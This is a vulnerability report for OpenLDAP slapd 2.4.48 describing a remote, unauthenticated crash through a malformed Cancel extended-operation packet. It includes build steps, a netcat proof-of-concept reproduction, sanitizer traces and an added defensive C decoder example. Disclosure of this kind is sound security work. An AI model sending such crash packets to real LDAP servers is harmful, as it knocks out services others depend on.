Full_Name: Stephan Zeisberg
Version: 2.4.48
OS: Fedora 31 (kernel 5.3.11-300.fc31.x86_64)
URL:
Submission from: (NULL) (217.228.59.1)
# Issue description
Unauthenticated remote denial of service through a malformed LDAP packet, caused by a NULL pointer dereference in the ber_skip_tag function (libraries/liblber/decode.c).
# Version
openldap-2.4.48.tgz
# How to reproduce
## Compile
$ tar xzvf openldap-2.4.48.tgz
$ cd openldap-2.4.48
$ ./configure --prefix=/tmp/openldap
$ make depend
$ make
$ make install
$ cd /tmp/openldap
## Start server
$ ./libexec/slapd -d 1 -h ldap://127.0.0.1:9091
## Create PoC crash file
$ echo -n "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" | xxd -r -p > ldap.crash
## Execute PoC (may need to be executed multiple times)
$ nc 127.0.0.1 9091 < ldap.crash
# Valgrind + UBSAN
5de0ddc3 connection_read(12): checking for input on id=1000
ber_get_next
ber_scanf fmt ({i}) ber:
==4066091== Thread 3:
==4066091== Invalid read of size 1
==4066091==    at 0x63E1DF: ber_skip_tag (decode.c:256)
==4066091==    by 0x63F7A8: ber_scanf (decode.c:865)
==4066091==    by 0x4FD051: cancel_extop (cancel.c:52)
==4066091==    by 0x4BE530: fe_extended (extended.c:222)
==4066091==    by 0x4BE36B: do_extended (extended.c:177)
==4066091==    by 0x472CA7: connection_operation (connection.c:1158)
==4066091==    by 0x471331: connection_read_thread (connection.c:1294)
==4066091==    by 0x5FEE79: ldap_int_thread_pool_wrapper (tpool.c:696)
==4066091==    by 0xCA384E1: start_thread (in /usr/lib64/libpthread-2.30.so)
==4066091==    by 0xCCC6692: clone (in /usr/lib64/libc-2.30.so)
==4066091==  Address 0x0 is not stack'd, malloc'd or (recently) free'd
==4066091==
UndefinedBehaviorSanitizer5de0ddc3 ber_get_next on fd 12 failed errno=0 (Success)
:DEADLYSIGNAL
==4066091==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000063e1df bp 0x00004ee77660 sp 0x00004ee77640 T4066125)
==4066091==The signal is caused by a READ memory access.
==4066091==Hint: address points to the zero page.
==4066129== Warning: invalid file descriptor 1024 in syscall close()
    #0 0x63e1de in ber_skip_tag /tmp/openldap-2.4.48/libraries/liblber/decode.c:255:15
    #1 0x63f7a8 in ber_scanf /tmp/openldap-2.4.48/libraries/liblber/decode.c:865:10
    #2 0x4fd051 in cancel_extop /tmp/openldap-2.4.48/servers/slapd/cancel.c:52:7
    #3 0x4be530 in fe_extended /tmp/openldap-2.4.48/servers/slapd/extended.c:222:16
    #4 0x4be36b in do_extended /tmp/openldap-2.4.48/servers/slapd/extended.c:177:15
    #5 0x472ca7 in connection_operation /tmp/openldap-2.4.48/servers/slapd/connection.c:1158:7
    #6 0x471331 in connection_read_thread /tmp/openldap-2.4.48/servers/slapd/connection.c:1294:14
    #7 0x5fee79 in ldap_int_thread_pool_wrapper /tmp/openldap-2.4.48/libraries/libldap_r/tpool.c:696:3
    #8 0xca384e1 in start_thread (/lib64/libpthread.so.0+0x94e1)
    #9 0xccc6692 in clone (/lib64/libc.so.6+0x101692)
UndefinedBehaviorSanitizer can not provide additional info.
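The trace shows cancel_extop handing the Cancel request value to ber_scanf with format "{i}" (SEQUENCE { INTEGER }) and ber_skip_tag reading one byte at address 0x0. As an added illustration, not OpenLDAP's code and not its eventual fix, the following standalone decoder for that same "{i}" value shows the defensive shape such a path needs: every tag and length read is bounds-checked, and a NULL or zero-length value is rejected before any byte is dereferenced. The ber_view type and the function names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define BER_ERR (-1)

/* Hypothetical cursor over a BER-encoded request value (not liblber's
 * BerElement). ptr may be NULL when the value carried no bytes at all. */
typedef struct { const uint8_t *ptr, *end; } ber_view;

/* Read one tag byte; refuse NULL or exhausted input instead of reading it. */
static int read_tag(ber_view *b) {
    if (b->ptr == NULL || b->ptr >= b->end) return BER_ERR;
    return *b->ptr++;
}

/* Read a short-form definite length and check it fits the remaining bytes. */
static int read_len(ber_view *b) {
    if (b->ptr == NULL || b->ptr >= b->end) return BER_ERR;
    int len = *b->ptr++;
    if (len & 0x80) return BER_ERR;                  /* long form: out of scope */
    if ((size_t)(b->end - b->ptr) < (size_t)len) return BER_ERR; /* truncated */
    return len;
}

/* Decode the Cancel request value "{i}" = SEQUENCE { INTEGER cancelID }.
 * Returns 0 and stores the ID, or BER_ERR for empty or malformed input. */
int decode_cancel_value(const uint8_t *buf, size_t buflen, int32_t *id) {
    ber_view b = { buf, (buf != NULL) ? buf + buflen : NULL };
    if (buf == NULL || buflen == 0) return BER_ERR;  /* the empty-value case */
    if (read_tag(&b) != 0x30) return BER_ERR;        /* SEQUENCE */
    if (read_len(&b) == BER_ERR) return BER_ERR;
    if (read_tag(&b) != 0x02) return BER_ERR;        /* INTEGER */
    int ilen = read_len(&b);
    if (ilen < 1 || ilen > 4 || (b.ptr[0] & 0x80)) return BER_ERR; /* messageID >= 0 */
    uint32_t v = 0;
    for (int i = 0; i < ilen; i++) v = (v << 8) | b.ptr[i];
    *id = (int32_t)v;
    return 0;
}

int main(void) {
    /* Constructed inputs: a well-formed Cancel value and an empty one. */
    const uint8_t good[] = { 0x30, 0x03, 0x02, 0x01, 0x2a };
    int32_t id = 0;
    printf("good: rc=%d id=%d\n", decode_cancel_value(good, sizeof good, &id), id);
    printf("empty: rc=%d\n", decode_cancel_value(NULL, 0, &id));
    return 0;
}
```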
Please let me know what additional information I can provide to successfully reproduce the issue.
Note: I have also tested and reproduced the issue using the precompiled package from the Fedora repositories: openldap-servers-2.4.47-3.fc31.x86_64 (OpenLDAP: slapd 2.4.47 (Jul 25 2019 00:00:00))
-Stephan Zeisberg